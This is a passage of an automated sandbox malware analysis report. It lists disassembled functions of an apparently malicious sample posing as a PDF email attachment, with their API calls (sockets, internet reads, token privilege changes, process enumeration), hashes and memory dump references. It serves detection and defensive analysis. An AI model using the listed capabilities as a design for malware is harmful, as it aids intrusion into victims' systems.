                                                                                                          • Opcode Fuzzy Hash: 94341efd229e89a48fae0c93de7290328efa922188e5b1b1e6193056ff2fcd9c
                                                                                                          • Instruction Fuzzy Hash: A9219E71600204DFCB10EF64CC89FAEB7B9EF49721F14815DE916A7291CB78AD05CB51
                                                                                                          Function 00765520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                          • _memmove.LIBCMT ref: 007A0258
                                                                                                          • _memmove.LIBCMT ref: 007A036D
                                                                                                          • _memmove.LIBCMT ref: 007A0414
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 1300846289-0
                                                                                                          • Opcode ID: 1c0ffd44fd3b7fcb3a03956cac4ebdaa5897431fcb8844a8443a62559018b67f
                                                                                                          • Instruction ID: 39b4ca4bc9b649e9ef65f962530ba03d9462d7602dc4e61fcbabfd3c86a94f93
                                                                                                          • Opcode Fuzzy Hash: 1c0ffd44fd3b7fcb3a03956cac4ebdaa5897431fcb8844a8443a62559018b67f
                                                                                                          • Instruction Fuzzy Hash: B902DFB0A00209DFCF04DF64D985AAEBBB5FF85300F548469E80ADB291EB79DD54CB91
                                                                                                          Function 00751287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 007519FA
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00751A4E
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00751A61
                                                                                                            • Part of subcall function 00751290: DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorProc$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3744519093-0
                                                                                                          • Opcode ID: 1b2d036a9a62e2c28ca6c1ce37f6bdd7c258ec40daf572e086c30aed1e43f605
                                                                                                          • Instruction ID: 525d74bdab89edff5f24745d8c41d821bd56d391d8125b1c7100de344a8fe07a
                                                                                                          • Opcode Fuzzy Hash: 1b2d036a9a62e2c28ca6c1ce37f6bdd7c258ec40daf572e086c30aed1e43f605
                                                                                                          • Instruction Fuzzy Hash: 73A15D75102585FAD62ABB384C48FFF266CDF42343B94811AFD02D1192DBACAD09D3B2
                                                                                                          Function 007C6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C7DB6
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007C679E
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C67C7
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 007C6800
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C680D
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 007C6821
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 99427753-0
                                                                                                          • Opcode ID: 36bf5ee9e5fbd3a13da8bc8f1eb27f1d0ce4aa4f03df0d3c5eabd4acc8e89401
                                                                                                          • Instruction ID: 22ae31fdde398cef95695c78cc6a4af162699b1ed9b5a74226e041970d79c73f
                                                                                                          • Opcode Fuzzy Hash: 36bf5ee9e5fbd3a13da8bc8f1eb27f1d0ce4aa4f03df0d3c5eabd4acc8e89401
                                                                                                          • Instruction Fuzzy Hash: 8041B775B00204EFDB50AF248C8AFAE77E49B45714F04845CFE16AB3D2CAB8AD048B91
                                                                                                          Function 007D5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: e449c47a9896d36b7fd2bcb28476d4c6f6381e14de10f11a6b3eb7b135cfc182
                                                                                                          • Instruction ID: 430eaf7c51805fa0dc598161bb53471d94c08395e6d478bee731a8278a3f56bb
                                                                                                          • Opcode Fuzzy Hash: e449c47a9896d36b7fd2bcb28476d4c6f6381e14de10f11a6b3eb7b135cfc182
                                                                                                          • Instruction Fuzzy Hash: D611C8317015119FDB215F26DC48A6E7BB9EF447A5B44842BF846D7341CBBCDD018AA4
                                                                                                          Function 007A80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A80C0
                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A80CA
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A80D9
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A80E0
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A80F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                          • Instruction ID: 2369b0c21071eddf2fe8de9b51206cc66b20f6357824059c43e6b0a1e3a9881b
                                                                                                          • Opcode Fuzzy Hash: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                          • Instruction Fuzzy Hash: 4FF06231241208AFEB101FA5EC8DE673BBCEF8A755B14412AF946C7150CB699D41DA61
                                                                                                          Function 00754B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00754AD0), ref: 00754B45
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00754B57
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                          • API String ID: 2574300362-192647395
                                                                                                          • Opcode ID: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                                                                                                          • Instruction ID: fab69a46c42d257dd0acabb9442a2cbdf4050659b6a75d53d56a6548e25a1c7b
                                                                                                          • Opcode Fuzzy Hash: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                                                                                                          • Instruction Fuzzy Hash: 47D0C2B0A00717DFC7208F31D818B4272F4AF01341B14C83BD883D2250D7B8D4C0C618
                                                                                                          Function 007CEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 007CEE3D
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 007CEE4B
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 007CEF0B
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007CEF1A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2576544623-0
                                                                                                          • Opcode ID: 05054ac415bb8abf6c6bc4d447acdf3b3469ff1986c0c46affc6994e3ee6571e
                                                                                                          • Instruction ID: c85041aa51a1a964b7c1bbeb5a06ea1e13cda6001512f0c1ab9176442e93dfa0
                                                                                                          • Opcode Fuzzy Hash: 05054ac415bb8abf6c6bc4d447acdf3b3469ff1986c0c46affc6994e3ee6571e
                                                                                                          • Instruction Fuzzy Hash: BA518E71504701EFD310EF24DC89EABB7E8EF94750F10482DF995972A1EBB4A908CB92
                                                                                                          Function 007AE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007AE628
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen
                                                                                                          • String ID: ($|
                                                                                                          • API String ID: 1659193697-1631851259
                                                                                                          • Opcode ID: d5aa16c7fae1a7ca9946632028bd393bb6875273faee33c82b7ac6036204e747
                                                                                                          • Instruction ID: 244a026bcc675044eb11c4efb7e07ff912f5d4fd33cc38461bce8b3c2fc38044
                                                                                                          • Opcode Fuzzy Hash: d5aa16c7fae1a7ca9946632028bd393bb6875273faee33c82b7ac6036204e747
                                                                                                          • Instruction Fuzzy Hash: 55322375A00705DFDB28CF59C481A6AB7F0FF89320B15C56EE89ADB3A1E774A941CB40
                                                                                                          Function 007C22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007C180A,00000000), ref: 007C23E1
                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C2418
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 599397726-0
                                                                                                          • Opcode ID: e47da870ff2452e775e762b1a43e5d9231c8ae403a29f717ded57e02c03e2ef9
                                                                                                          • Instruction ID: 1bee6e7a9023521a0704b135557d9b29a44dc2431844862c8076cd6324a00b63
                                                                                                          • Opcode Fuzzy Hash: e47da870ff2452e775e762b1a43e5d9231c8ae403a29f717ded57e02c03e2ef9
                                                                                                          • Instruction Fuzzy Hash: FB41D471A04249FFEB10DE95DC85FBB77BDEB40724F10806EF605A6142DB7C9E429650
                                                                                                          Function 007BB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007BB343
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BB39D
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BB3EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID:
                                                                                                          • API String ID: 1682464887-0
                                                                                                          • Opcode ID: b4acdbe9a00402806bc5f35f219744b5d0ce3d7c04ff2bf1ac759d88d7c2e97f
                                                                                                          • Instruction ID: cd0c22193fcd15e90d7d1b6f945a1f8dc9ccd52ccd4022f0771c7579c14ba992
                                                                                                          • Opcode Fuzzy Hash: b4acdbe9a00402806bc5f35f219744b5d0ce3d7c04ff2bf1ac759d88d7c2e97f
                                                                                                          • Instruction Fuzzy Hash: 56217135A00618EFCB00EFA5D885EEDBBB8FF49311F1480AAE905AB351CB75A915CF50
                                                                                                          Function 007A87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A882B
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8858
                                                                                                          • GetLastError.KERNEL32 ref: 007A8865
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 1922334811-0
                                                                                                          • Opcode ID: f4dd714c53d346a5bfdfe88115d5ee7b12b805b2a609f487a892a1f63f9d0e7d
                                                                                                          • Instruction ID: b17fe638203e87e35e9fe5dda0f9601ea15ae3d1851063e23478f8a29ba063fa
                                                                                                          • Opcode Fuzzy Hash: f4dd714c53d346a5bfdfe88115d5ee7b12b805b2a609f487a892a1f63f9d0e7d
                                                                                                          • Instruction Fuzzy Hash: D1116DB2514304AFE728EFA4DC85D6BB7F8EB45710B24C62EE45697241EE78AC408B60
                                                                                                          Function 007A874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007A8774
                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007A878B
                                                                                                          • FreeSid.ADVAPI32(?), ref: 007A879B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3429775523-0
                                                                                                          • Opcode ID: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                                                                                                          • Instruction ID: 6dd359991f7643436081f34335cccfcf6c364918b8ceaff5437478ccb307528f
                                                                                                          • Opcode Fuzzy Hash: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                                                                                                          • Instruction Fuzzy Hash: 10F04F75A1130CBFDF00DFF4DC89AADB7BCEF08201F508469E502E3281D6755A048B54
                                                                                                          Function 007B4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 007B4CB3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: mouse_event
                                                                                                          • String ID: DOWN
                                                                                                          • API String ID: 2434400541-711622031
                                                                                                          • Opcode ID: 5592e57d0457dacaea08e80b4d23a6ffdedfdc689a387ec821758969cdde2d68
                                                                                                          • Instruction ID: 21edce1f9bf18644cc5fca3ef09f2511c514adf50c72a8c9cd625249fa01797a
                                                                                                          • Opcode Fuzzy Hash: 5592e57d0457dacaea08e80b4d23a6ffdedfdc689a387ec821758969cdde2d68
                                                                                                          • Instruction Fuzzy Hash: C9E04F6219972138F9842518BC0AEF7074C8B127317515146F824D51C2ED8C1C8324B8
                                                                                                          Function 007BC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007BC6FB
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BC72B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: 49f3fe5d1ec0dfd1db25575eea9ba6c1d534104661f618e66da3dcf73493edc5
                                                                                                          • Instruction ID: af3781761f9e20e3780c0dede563dee0a22703c22064a4ba928034ca8d849855
                                                                                                          • Opcode Fuzzy Hash: 49f3fe5d1ec0dfd1db25575eea9ba6c1d534104661f618e66da3dcf73493edc5
                                                                                                          • Instruction Fuzzy Hash: B51170716006049FDB109F29C849A6AB7E5EF85321F04851AF9A59B290DB74A805CF81
                                                                                                          Function 007BA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007C9468,?,007DFB84,?), ref: 007BA097
                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007C9468,?,007DFB84,?), ref: 007BA0A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
